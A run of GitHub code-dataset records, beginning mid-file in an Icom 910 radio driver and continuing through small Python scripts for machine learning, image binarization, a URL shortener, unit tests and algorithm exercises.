command.\")\n else:\n raise command.CommandError(\"The \"+self.driver.id+\" command handler does not have an initialized Hamlib rig.\")\n\n def settings_set_mode(self):\n \"\"\" Meta-data for the \"set_mode\" command.\n\n @return Returns a dictionary containing meta-data about the command.\n \"\"\"\n\n command_parameters = [\n {\n \"type\": \"select\",\n \"required\": True,\n \"title\": \"mode\",\n \"description\": \"The Icom 910's mode.\",\n \"multiselect\": False,\n \"options\": [\n ['FM', 'FM']\n ]\n }\n ]\n\n return build_metadata_dict(command_parameters, 'set_mode', self.name, requires_active_session = True)\n\n def command_set_rx_freq(self, active_command):\n \"\"\" Sets the downlink frequency of the radio.\n\n @note This driver works in half-duplex mode with the RX frequency set on the main VFO and the TX frequency set via \n a split mode.\n\n @throws Raises CommandError if the command fails for some reason.\n \n @param active_command The executing Command. 
Contains the command parameters.\n @return Returns a dictionary containing the command response.\n \"\"\"\n\n if self.radio_rig is not None:\n if 'rx_freq' in active_command.parameters:\n # Set the rx frequency as the main VFO frequency\n response = self.radio_rig.set_freq(int(active_command.parameters['rx_freq']*1000000), Hamlib.RIG_VFO_MAIN)\n\n if response != Hamlib.RIG_OK:\n raise command.CommandError(\"An error occurred while setting the radio's RX frequency on the main VFO.\")\n\n # Get the main VFO frequency and update the driver state\n radio_freq = self.radio_rig.get_freq()\n if self.driver._radio_state['set_rx_freq'] == 0:\n self.driver._radio_state['set_rx_freq'] = radio_freq\n else:\n self.driver._radio_state['shifted_rx_freq'] = radio_freq\n return {'message': \"The radio's RX frequency has been set.\", 'frequency': (radio_freq/1000000)}\n else:\n raise command.CommandError(\"No RX frequency specified for the 'set_rx_freq' command.\")\n else:\n raise command.CommandError(\"The \"+self.driver.id+\" command handler does not have an initialized Hamlib rig.\")\n\n def settings_set_rx_freq(self):\n \"\"\" Meta-data for the \"set_rx_freq\" command.\n\n @return Returns a dictionary containing meta-data about the command.\n \"\"\"\n\n command_parameters = [\n {\n \"type\": \"number\",\n \"required\": True,\n \"title\": \"rx_frequency\",\n \"description\": \"The Icom 910's downlink frequency (in MHz).\",\n \"integer\": False\n }\n ]\n\n return build_metadata_dict(command_parameters, 'set_rx_freq', self.name, requires_active_session = True)\n\n def command_set_tx_freq(self, active_command):\n \"\"\" Sets the uplink frequency for the radio.\n\n @note This driver works in half-duplex mode and sets the TX frequency via a split.\n @note If someone attempts to change the TX frequency while transmitting (as determined by the \n 'doppler_update_inactive_tx_delay' configuration setting), this command will fail. 
If the driver doesn't have \n any tnc_state service set, this protection will not take place.\n\n @throws Raises CommandError if the command fails for some reason.\n \n @param active_command The currently executing Command.\n @return Returns a dictionary containing the command response.\n \"\"\"\n\n # Set the uplink frequency if the rig has been initialized\n if self.radio_rig is not None:\n if 'tx_freq' in active_command.parameters:\n # Make sure the TNC isn't transmitting\n if self.driver._tnc_state_service is not None:\n tnc_state = self.driver._tnc_state_service.get_state()\n tnc_last_transmitted = tnc_state['last_transmitted']\n tnc_buffer_len = tnc_state['output_buffer_size_bytes']\n if (int(time.time()) - tnc_last_transmitted) < self.driver.doppler_update_inactive_tx_delay or tnc_buffer_len > 0:\n raise command.CommandError(\"The pipeline's TNC has recently transmitted data or has pending data in its \"+\n \"output buffer and is not ready to have its uplink frequency changed.\")\n\n response = self.radio_rig.set_split_freq(Hamlib.RIG_VFO_MAIN, int(active_command.parameters['tx_freq']*1000000))\n\n if response != Hamlib.RIG_OK:\n raise command.CommandError(\"An error occurred while setting the radio's split TX frequency.\")\n\n # Get the main VFO frequency and update the driver state\n radio_freq = self.radio_rig.get_split_freq()\n if self.driver._radio_state['set_tx_freq'] == 0.0:\n self.driver._radio_state['set_tx_freq'] = radio_freq\n else:\n self.driver._radio_state['shifted_tx_freq'] = radio_freq\n return {'message': \"The radio's TX frequency has been set using a split.\", 'frequency': radio_freq/1000000}\n else:\n raise command.CommandError(\"No TX frequency specified for the 'set_tx_freq' command.\")\n else:\n raise command.CommandError(\"The \"+self.driver.id+\" command handler does not have an initialized Hamlib rig.\")\n\n def settings_set_tx_freq(self):\n \"\"\" Meta-data for the \"set_tx_freq\" command.\n\n @return Returns a dictionary containing meta-data about the command.\n \"\"\"\n\n command_parameters = [\n {\n \"type\": \"number\",\n \"required\": True,\n \"title\": \"tx_frequency\",\n \"description\": \"The Icom 910's uplink frequency (in MHz).\",\n \"integer\": False\n }\n ]\n\n return build_metadata_dict(command_parameters, 'set_tx_freq', self.name, requires_active_session = True)\n\nclass ICOM910Error(Exception):\n pass\nclass InvalidTargetPosition(ICOM910Error):\n pass","repo_name":"MichiganExplorationLab/Mercury2-HWM","sub_path":"hwm/hardware/devices/drivers/icom_910/icom_910.py","file_name":"icom_910.py","file_ext":"py","file_size_in_byte":16413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12184636348","text":"# Write a program to check the truth of the statement ¬(X ⋁ Y ⋁ Z) = ¬X ⋀ ¬Y ⋀ ¬Z\n# for all predicate values.\n\ndef check_equality(x, y, z):\n left = not(x or y or z)\n print('left =', left)\n right = not x and not y and not z\n print('right =', right)\n print('left = right holds:', left == right)\n\n# read 0/1 and convert to bool so the logic operates on truth values\na = bool(int(input(\"X: \")))\nb = bool(int(input(\"Y: \")))\nc = bool(int(input(\"Z: \")))\ncheck_equality(a, b, c)","repo_name":"Shaikhutdinova/python_dz1","sub_path":"Task02.py","file_name":"Task02.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70785217794","text":"import numpy as np\nfrom keras.models import Sequential, load_model, Model\nfrom keras.layers.core import Dense, Activation, Flatten\nfrom keras.layers import 
Conv2D, MaxPooling2D, ConvLSTM2D, LSTM, Input\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nfrom keras.datasets import mnist\nfrom keras import backend as K\nimport h5py\nimport json\nimport tensorflow as tf\n\n\nwith open ('dictionary.json', 'r') as f:\n dictionary = json.load(f)\n\nwith open ('id_toword.json', 'r') as f:# movie name: caption sentence\n training_label_dict = json.load(f)\nwith open ('dict.json', 'r') as f:\n one_hot = json.load(f)\n\n\ntrain_data=[]\n'''z=np.zeros((1,64,64,1))\n\nfor d in training_label_dict:\n a=np.load(\"./MLDS_hw2_1_data/training_data/feat/{}.npy\".format(d))\n a=a.reshape(80,64,64,1)\n a=np.concatenate((a,z),axis=0)\n train_data.append(a)\n'''\nfor d in training_label_dict:\n a=np.load(\"./MLDS_hw2_1_data/training_data/feat/{}.npy\".format(d))\n a=a.reshape(80,4096)\n a=np.concatenate((a,np.zeros((1,4096))),axis=0)#PAD\n #a=np.concatenate((a,np.ones((1,4096))),axis=0)#BOS\n train_data.append(a)\ntrain_data=np.array(train_data)\n\nfor d in training_label_dict:\n training_label_dict[d]+=['<EOS>']\n l=len(training_label_dict[d])\n for i in range(35-l):\n training_label_dict[d]+=['<PAD>']\n\ntrain_label=[]\nfor d in training_label_dict:\n a=[]\n for w in training_label_dict[d]:\n if w in one_hot:\n a.append(one_hot[w])\n else:\n a.append(one_hot[\"<UNK>\"])\n train_label.append(a)\ntrain_label=np.array(train_label)\n\n#train_label=[] #ideal outputs\n\n\n#80, 4096 1450 movies\n# configure\nnum_encoder_tokens = 4096\nnum_decoder_tokens = len(dictionary)\nlatent_dim = 512\n\nout = [] # first decoder input\nfor i in range(1450):\n out.append(np.array(one_hot[\"<BOS>\"]).reshape(1,num_decoder_tokens))\nout=np.array(out)\n\n\ngt=np.concatenate((out,train_label[:,0:34,:]),axis=1)\n\n# Define an input sequence and process it.\nencoder_inputs = Input(shape=(None, num_encoder_tokens))\nencoder = LSTM(latent_dim, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# We discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, num_decoder_tokens))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. 
We don't use the\n# return states in the training model, but we will use them in inference.\ndecoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)\ndecoder_dense = Dense(num_decoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n# print the model\nprint(model.summary())\nmodel.compile(loss='categorical_crossentropy',optimizer='adam')#,metrics=['accuracy']\nResult=model.fit([train_data,gt],train_label,epochs=300,batch_size=10,verbose=1,shuffle=True)#,validation_data=(test_array_normalize, test_label_array)\n\nmodel.save('s2s_basic_dim512.h5')\n\n\n### PREDICT (INFERENCE)\n\nwith open ('MLDS_hw2_1_data/testing_label.json', 'r') as f:\n testing_label = json.load(f)\nID=[]\nfor d in testing_label:\n ID.append(d['id'])\n\ntest_data=[]\nfor i in ID:\n a=np.load(\"./MLDS_hw2_1_data/testing_data/feat/{}.npy\".format(i))\n a=a.reshape(80,4096)\n a=np.concatenate((a,np.zeros((1,4096))),axis=0)#PAD\n #a=np.concatenate((a,np.ones((1,4096))),axis=0)#BOS\n test_data.append(a)\ntest_data=np.array(test_data)\nnum_decoder_tokens = len(dictionary)\nout=[]\nfor i in range(len(ID)):\n out.append(np.array(one_hot[\"<BOS>\"]).reshape(1,num_decoder_tokens))\nout=np.array(out)\n\nwith open ('vec2word.json', 'r') as f:\n vec2word = json.load(f)\n\n# define encoder inference model\nencoder_model = Model(encoder_inputs, encoder_states)\n# define decoder inference model\ndecoder_state_input_h = Input(shape=(latent_dim,))\ndecoder_state_input_c = Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n# Define the decoder LSTM model\ndecoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = decoder_dense(decoder_outputs)\ndecoder_model = Model([decoder_inputs] + decoder_states_inputs,[decoder_outputs] + decoder_states)\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n states_value = encoder_model.predict(input_seq)\n\n # Sampling loop for a batch of sequences\n # (to simplify, here we assume a batch of size 1).\n ini_decoder_input = out #(100,1,2497)\n decoded_sentence = []\n for i in range(100):\n decoded_sentence.append('')\n \n for i in range(35):\n output_tokens, h, c = decoder_model.predict([ini_decoder_input] + states_value)\n ini_decoder_input=[]\n for k in range(100):\n \n #Sample a token\n sample=output_tokens[k][0]\n sample_num=np.argmax(sample)\n single_word=vec2word[str(sample_num)]\n decoded_sentence[k] += (' ' + single_word)\n\n # Update the target sequence (of length 1).\n target_seq = np.zeros((1, num_decoder_tokens))\n target_seq[0, sample_num] = 1.0\n ini_decoder_input.append(target_seq)\n # Update states\n states_value = [h, c]\n ini_decoder_input=np.array(ini_decoder_input)\n\n for i in range(100):\n tem = decoded_sentence[i].split(\"<EOS>\",1)\n decoded_sentence[i]=tem[0]\n tem = decoded_sentence[i].split(\"<PAD>\",1)\n decoded_sentence[i]=tem[0]\n tem = decoded_sentence[i].split(\".\",1)\n decoded_sentence[i]=tem[0]\n return decoded_sentence\n\nd_s=decode_sequence(test_data)\n#print(d_s)\nanswer=''\nfor i in range(len(ID)):\n answer+= (ID[i] + ',' + d_s[i] + 
'\\n')\n\n\nf=open('s2s_basic_dim512.txt','w')\nf.write(answer)\n","repo_name":"d31003/MLDS_2019spring","sub_path":"2/2-1/s2s.py","file_name":"s2s.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"30295661288","text":"\"\"\"add email token\n\nRevision ID: 8250c244bf1d\nRevises: 47e827ee0a4c\nCreate Date: 2022-05-12 11:11:25.507753\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8250c244bf1d'\ndown_revision = '47e827ee0a4c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('confirmed', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'confirmed')\n # ### end Alembic commands ###\n","repo_name":"cobbai/AICenter","sub_path":"migrations/versions/8250c244bf1d_add_email_token.py","file_name":"8250c244bf1d_add_email_token.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15975960013","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome()\n\ndriver.get(\"https://www.solarwinds.com/\")\ntime.sleep(2)\n# driver.find_element(By.ID, 'CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll').click()\ntime.sleep(2)\n# driver.delete_cookie(\"secure\")\n# driver.delete_all_cookies()\ndriver.add_cookie({\"name\": \"Gabriel\", \"value\": \"True\"})\ntime.sleep(2)\nprint(driver.get_cookie(\"Gabriel\"))\n# print(driver.get_cookies())","repo_name":"dev-com2020/Or_Sel2","sub_path":"cooki.py","file_name":"cooki.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40470440960","text":"\"\"\"\n\nGiven an array of integers, how many three numbers can be found in the array, so that we can build an triangle\nwhose three edges length is the three numbers that we find?\n\nExample\nGiven array S = [3,4,6,7], return 3. They are:\n\n[3,4,6]\n[3,6,7]\n[4,6,7]\nGiven array S = [4,4,4,4], return 4. 
They are:\n\n[4(1),4(2),4(3)]\n[4(1),4(2),4(4)]\n[4(1),4(3),4(4)]\n[4(2),4(3),4(4)]\n\n\"\"\"\n\nclass Solution:\n # @param S: a list of integers\n # @return: an integer\n def triangleCount(self, S):\n # write your code here\n out = 0\n if len(S)<3 or not S:\n return out\n S.sort()\n k = len(S)-1\n while k >= 2:\n i, j = 0, k-1\n target = S[k]\n while i < j:\n if S[i] + S[j] > target:\n out += j - i\n j -= 1\n else:\n i += 1\n k -= 1\n return out\n \n","repo_name":"akb46mayu/Data-Structures-and-Algorithms","sub_path":"LintcodePartII/li382_triangleCount.py","file_name":"li382_triangleCount.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16766179790","text":"import sys\nsys.stdin = open(\"sample_input.txt\")\n\nt = int(input())\nfor tc in range(1, t+1):\n n = int(input())\n number = input() # may start with 0, so read it as a str\n numbers = [0] * 10 # list to hold the counts of digits 0~9\n\n for num in number:\n numbers[int(num)] += 1 # count digits 0~9 into the numbers list\n\n card = 0 # most frequent digit, initialized to 0\n card_count = numbers[0] # count of the most frequent digit, initialized to numbers[0]\n for i in range(1, len(numbers)): # from 1 (numbers[0] is already card_count) to len(numbers)\n if numbers[i] >= card_count: # use >= so that on a tie the larger digit wins\n card_count = numbers[i] # update card_count\n card = i # update card\n print(f'#{tc} {card} {card_count}')\n\n\n\n\n","repo_name":"yooooonzzzzzang/Algorithm","sub_path":"01_List1_실습/02_4834_cards/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71151237634","text":"print('Task 2. Debt collectors')\n\nname = input(\"Debtor's name:\")\nsum_dolg = int(input(\"Debt amount:\"))\nx = 0\nwhile sum_dolg != x:\n print(f\"{name}, your debt is {sum_dolg} rubles.\")\n x = int(input(\"How many rubles will you pay right now to settle it?\"))\n if x < sum_dolg:\n print(f\"Not enough, {name}. Let's try again.\")\n else:\n break\nprint(f\"Great, {name}! You have paid off the debt. 
Thank you!\")","repo_name":"DefaultPerson/python-learn-guide","sub_path":"python_course/python_course_answers/module_0_6/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"32974764091","text":"import os\nimport numpy as np\nfrom PIL import Image\n\n# rename files\ndef FileReName(DogType,FilePath):\n type_counter = 0\n for type in DogType:\n file_counter = 0\n subfolder = os.listdir(FilePath + type)\n for subclass in subfolder:\n file_counter += 1\n # print(\"file_counter:\",file_counter)\n # print(\"type_counter:\",type_counter)\n # print(subclass)\n os.rename(FilePath + type + \"/\" + subclass,FilePath + type + \"/\" + str(type_counter) + \"_\" + str(file_counter) + \"_\" + type + \".jpg\")\n type_counter += 1\n print(\"rename finish!\")\n\n# resize images\ndef FileResize(Output_folder,DogType,FilePath,Width = 100,Height = 100):\n for type in DogType:\n subfolder = os.listdir(FilePath + type)\n for subclass in subfolder:\n img_open = Image.open(FilePath + type + \"/\" + str(subclass))\n conv_RGB = img_open.convert(\"RGB\")\n Resize_img = conv_RGB.resize((Width,Height),Image.BILINEAR)\n Resize_img.save(os.path.join(Output_folder,os.path.basename(subclass)))\n print(\"resize finish!\")\n\n\n# read an image and return it as array data\ndef ReadImage(filename,train_folder):\n img = Image.open(train_folder+filename)\n # convert the photo into a numpy array\n return np.array(img)\n\n# load images into lists: images and labels\ndef DataSet(train_folder):\n Train_list_img = []\n Train_list_label = []\n\n for file_1 in os.listdir(train_folder):\n file_img_to_array = ReadImage(file_1,train_folder)\n # append the image array to the main list\n Train_list_img.append(file_img_to_array)\n # append the label to the main list\n Train_list_label.append(int(file_1.split(\"_\")[0]))\n # print(Train_list_label)\n\n Train_list_img = np.array(Train_list_img)\n Train_list_label = np.array(Train_list_label)\n\n print(\"dataset finish!\")\n print(Train_list_img.shape)\n print(Train_list_label.shape)\n\n\nif __name__ == \"__main__\":\n\n DogType = [\"哈士奇\",\"德国牧羊犬\",\"拉布拉多\",\"萨摩耶犬\"]\n\n # # rename\n # FileReName(DogType = DogType,FilePath = \"raw_image/\")\n #\n # # resize\n # FileResize(DogType = DogType,FilePath = \"raw_image/\",Output_folder = \"train_image/\")\n #\n # # prepared data\n # DataSet(train_folder = \"train_image/\")\n","repo_name":"W-yt/Keras","sub_path":"catdog/PreDataProcess.py","file_name":"PreDataProcess.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73042854593","text":"\"\"\" Unittest testing suite for mocks \"\"\"\n\n\nimport logging\nimport unittest\nimport sys\n\nfrom datetime import datetime\nfrom src.mocks import Calendar\nfrom unittest.mock import Mock\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nclass TestCalendars(unittest.TestCase):\n\n def test_is_weekday(self):\n calendar = Calendar()\n # Mock datetime to control today's date\n date = Mock()\n\n # Mock .today() to return Monday (0)\n date.day.return_value = 0\n # Test Monday is a weekday\n assert calendar.is_weekday(date)\n # Mock .today() to return Saturday\n date.day.return_value = 5\n # Test Saturday is not a weekday\n assert not calendar.is_weekday(date)\n logging.info(\"mocks unittest, is_weekday 
passed\")\n\n\n def test_is_leap_year(self):\n calendar = Calendar()\n date = Mock()\n\n date.year.side_effect = [2000, 2013, '2222']\n assert calendar.is_leap_year(date)\n assert not calendar.is_leap_year(date)\n with self.assertRaises(TypeError) as context:\n calendar.is_leap_year(date)\n self.assertTrue('not integer' in str(context.exception))\n\nif __name__ == 'unittest.__main__':\n unittest.main()\n\n\n","repo_name":"BrianCechmanek/DSOps","sub_path":"unit_testing/tests/unittests/test_mocks.py","file_name":"test_mocks.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72512185795","text":"from app.internal.repository.postgresql.connection import get_connection\nfrom app.internal.repository.postgresql.handlers.collect_response import (\n collect_response,\n)\nfrom app.internal.repository.repository import Repository\nfrom app.pkg import models\n\n__all__ = [\"ShortenerRepository\"]\n\n\nclass ShortenerRepository(Repository):\n @collect_response\n async def create(\n self,\n cmd: models.CreateShortUrlCommand\n ) -> models.ShortUrlInternal:\n q = \"\"\"\n insert into urls(\n full_url, short_url_domain, short_url_code\n ) values (\n %(full_url)s,\n %(short_url_domain)s,\n %(short_url_code)s\n )\n on conflict (full_url) do update \n set is_active = true\n returning id, full_url, short_url_domain, short_url_code;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n\n @collect_response\n async def update_counter_value(self) -> models.CounterModel:\n q = \"\"\"\n update counters\n set value = value + 1\n where id = 1\n returning value;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q)\n return await cur.fetchone()\n\n @collect_response\n async def delete_short_url(\n self,\n cmd: models.FullUrlCommand,\n ) -> models.UrlModel:\n q = \"\"\"\n update urls\n set is_active = false\n where short_url_code = %(short_url_code)s\n and short_url_domain = %(short_url_domain)s\n returning id, full_url, short_url_domain, short_url_code, is_active;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n\n @collect_response\n async def read_full_url(\n self,\n cmd: models.FullUrlCommand,\n ) -> models.FullUrlModel:\n q = \"\"\"\n select full_url\n from urls\n where short_url_code = %(short_url_code)s\n and short_url_domain = %(short_url_domain)s\n and is_active = true;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n\n @collect_response\n async def read_short_url_code(\n self,\n cmd: models.FullUrlModel,\n ) -> models.ShortUrlInternal:\n q = \"\"\"\n select id, full_url, short_url_domain, short_url_code\n from urls\n where full_url = %(full_url)s\n and is_active = true;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n","repo_name":"newoks/URL-shortener","sub_path":"app/internal/repository/postgresql/shortener.py","file_name":"shortener.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11962522987","text":"import sys\nsys.stdin = open('input.txt')\n\nN, M = map(int,sys.stdin.readline().split())\ntree = list(map(int,sys.stdin.readline().split()))\nstart = 1\nend = max(tree)\n\n\nwhile start <= end:\n mid = (start + end) // 2\n 
temp = 0\n for i in tree:\n if i - mid > 0:\n temp += i - mid\n if temp >= M:\n start = mid + 1\n else:\n end = mid - 1\nprint(end)","repo_name":"sw200662/Algorithm_my","sub_path":"2112/1209/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22829509731","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\nclass QHarness:\n\n def __init__(self, market, trader):\n self.market = market\n self.trader = trader\n self.n = len(self.trader.traders)\n self.returns = []\n self.regrets = []\n\n def train(self, n_episodes, n_t, verbose=False):\n self.trader.switch_to_training_mode()\n\n for episode in range(n_episodes):\n\n episode_returns = []\n episode_regrets = []\n self.trader.reset()\n ws = self.trader.w\n \n for t in range(n_t):\n next_ws, actions = self.trader.act(ws)\n\n returns, raw_returns = self.market.step(ws)\n avg_r = np.sum(returns)\n regret = self._regret(raw_returns, avg_r)\n\n self.trader.step(ws, actions, self.n*[avg_r], next_ws, None)\n\n ws = next_ws\n\n episode_returns.append(avg_r)\n episode_regrets.append(regret)\n\n self.returns.append(episode_returns)\n self.regrets.append(episode_regrets)\n\n def evaluate(self, n_episodes, render=False, render_sleep=0.25):\n pass\n\n def _regret(self, rs, avg_r):\n return rs[0][self.market.best] - avg_r\n\n def plot_training_results(self, file_name=None, window=None):\n returns = np.mean(self.returns, axis=0)\n std = np.std(self.returns, axis=0)\n if window:\n returns = np.array(pd.Series(returns).rolling(window).mean()[window - 1:])\n std = np.array(pd.Series(std).rolling(window).mean()[window - 1:])\n plot_rewards(returns, std=std, file_name=file_name)\n\n def plot_training_regret(self, file_name=None, window=None):\n regrets = np.mean(self.regrets, axis=0)\n std = np.std(self.regrets, axis=0)\n if window:\n regrets = np.array(pd.Series(regrets).rolling(window).mean()[window - 1:])\n std = np.array(pd.Series(std).rolling(window).mean()[window - 1:])\n plot_rewards(regrets, std, file_name)\n\ndef plot_rewards(r, std=None, file_name=None):\n plt.figure(figsize=(8, 6), dpi=100)\n plt.plot(r)\n plt.fill_between(range(len(r)), r + std, r - std, alpha=0.2)\n plt.title('Returns Over Time')\n plt.xlabel('Timestep')\n plt.ylabel('Return')\n if file_name:\n plt.savefig('./{}'.format(file_name))\n plt.clf()\n else:\n plt.show()","repo_name":"mjhoshea/portfolio-optimisation","sub_path":"src/rl/harnesses/QHarness.py","file_name":"QHarness.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26323768683","text":"import json\nfrom traceback import print_tb\nimport numpy as np\nfrom PIL import Image\nfrom skimage.color import rgb2gray\nfrom skimage.filters import (threshold_otsu, threshold_niblack,\n threshold_sauvola, threshold_minimum, threshold_li)\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport os\nimport torch\n\n\nwith open(\"config.json\") as f:\n conf = json.load(f)\n\nmatplotlib.rcParams['font.size'] = 9\nth_window_size = conf[\"th_window_size\"]\n\ndef compute_threshold(input_binaries, bias, weight=1):\n n, m, k = input_binaries.shape\n pixel_image = np.zeros(input_binaries.shape[:2])\n window_image = np.zeros(input_binaries.shape[:2])\n for i in range(n):\n for j in range(m):\n # if white is the majority this will be > 1/2\n current_pixel_sum = np.sum(input_binaries[i, j, 
:])\n current_pixel_th = current_pixel_sum/k \n\n left = j-th_window_size if j >= th_window_size else 0\n right = j+th_window_size if j < m-th_window_size else n\n top = i-th_window_size if i >= th_window_size else 0\n bottom = i+th_window_size if i < n-th_window_size else m\n right+=1\n bottom+=1\n # check what the majority is within a window\n # if white is the majority this will be > 1/2\n window = input_binaries[top:bottom, left:right, :]\n window_sum = np.sum(window)-current_pixel_sum\n n_elements = ((right-left)*(bottom-top)*k)-k\n window_th = window_sum/n_elements\n\n # take a linear combination of the two majorities because we want to weight them\n # give more weight to the majority on the current pixel\n pixel_image[i, j] = np.abs(bias-current_pixel_th)\n window_image[i, j] = window_th\n new_binary = pixel_image-window_image*weight\n \n return np.abs(new_binary)\n\ndef get_stacked_binaries(path):\n image = np.asarray(Image.open(path))[:,:,:3]\n\n gray_image = rgb2gray(image)\n \n thresh_global = threshold_otsu(gray_image)\n binary_global = gray_image > thresh_global\n\n thresh_min = threshold_li(gray_image)\n binary_min = gray_image > thresh_min\n\n window_size = 25\n thresh_niblack = threshold_niblack(gray_image, window_size=window_size, k=0.5)\n thresh_sauvola = threshold_sauvola(gray_image, window_size=window_size)\n\n binary_niblack = gray_image > thresh_niblack\n binary_sauvola = gray_image > thresh_sauvola\n\n binaries_list = [binary_global, binary_min, binary_niblack, binary_sauvola, gray_image]\n stacked_binaries = np.stack(binaries_list)\n thresh_global = np.ones(thresh_niblack.shape)*thresh_global\n thresh_list = [thresh_global, thresh_niblack, thresh_sauvola]\n\n stacked_thresh = np.stack(thresh_list)\n return stacked_binaries[:,:,:], stacked_thresh\n\ndef get_output(path):\n image = np.asarray(Image.open(path))\n if len(image.shape) == 3:\n return image[:, :, 0].reshape(1,200,-1)\n else:\n return image.reshape(1,200,-1)\n\ndef plot(image, title, row, col, pos):\n plt.subplot(row, col, pos)\n plt.imshow(image, cmap=plt.cm.gray)\n plt.title(title)\n plt.axis('off')\n\n\ndef get_numpy_data(data_path, processing, label):\n images = os.listdir(data_path)\n \n data = []\n thresh_stack = []\n for image_name in images:\n try:\n a=processing(os.path.join(data_path, image_name))\n\n if isinstance(a, tuple):\n thresh_stack.append(a[1])\n a = a[0]\n if(np.max(a)>1):\n a=a//255\n data.append(a)\n except Exception as e:\n print(image_name)\n print(e)\n exit(0)\n\n stacked_data = np.stack(data)\n print(f\"{label} shape:\"+str(stacked_data.shape))\n\n for i, j in enumerate(range(0,stacked_data.shape[0], conf[\"batch_size\"])):\n data = stacked_data[j:j+conf[\"batch_size\"],:,:,:]\n np.save(f\"{label}{i}\",data)\n return stacked_data, thresh_stack\n\n\ndef imshow(img):\n img = img / 2 + 0.5 \n plt.figure()\n plt.imshow(img,cmap = \"gray\")\n\ndef get_device():\n if torch.cuda.is_available():\n device = 'cuda:0'\n else:\n device = 'cpu'\n return device","repo_name":"gcristi23/proiectaci","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37029188458","text":"\"\"\"\nTask 1.\n\nGiven is code that stores, in an array, the\nindexes of the even elements of another array.\n\nMeasure the execution time of the code with the timeit module\n\nTry to optimize the code to reduce the execution time\nRepeat the 
